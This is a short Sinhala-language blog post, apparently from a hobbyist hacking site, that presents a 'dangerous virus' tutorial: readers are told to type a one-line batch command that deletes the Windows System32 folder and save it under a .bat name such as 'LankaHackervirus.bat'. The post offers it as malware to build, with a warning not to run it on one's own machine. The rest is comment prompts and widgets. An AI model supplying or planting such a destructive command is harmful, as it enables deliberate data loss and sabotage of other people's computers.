Windows Crash වෙන භයානක Virus එකක් හදමුද.....?

මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො...
@echo off del c:\windows\system32

ඒක ඔයාල කැමති නමකින් save කරගන්න පුළුවන්  . හැබැයි නම අගට .bat කියල දෙන්න ඕන.(Eg: LankaHackervirus.bat) මේක හදල ඉවර වෙලා open කරන්න යන්න නම් එපා. මේකෙන් ඔයාගෙ පරිගණකයේ System32 File එක Delete කරනවා.Windows Crash වෙනවා.කොහොමද එතකොට .ආයේ windows install කරන්න ආසාවක්‌ තියෙනවනම් මේක Run කරලා බලන්න .computer එක Format කරන වෙලාවක ඔයාලට මේක Run කරලා බලන්න පුළුවන් කොහොමද කියලා  .


Comment එකක් දාගෙනම  යන්න

0 comments:

add එකක් click කරලා උදව්වක් දෙන්න යාලුවනේ

add එකක්  click කරලා උදව්වක් දෙන්න යාලුවනේ
comment us

Comment එකක් දාගෙනම යන්න

Related Posts Plugin for WordPress, Blogger...
Flying Twitter Bird Widget By Trickstoo.com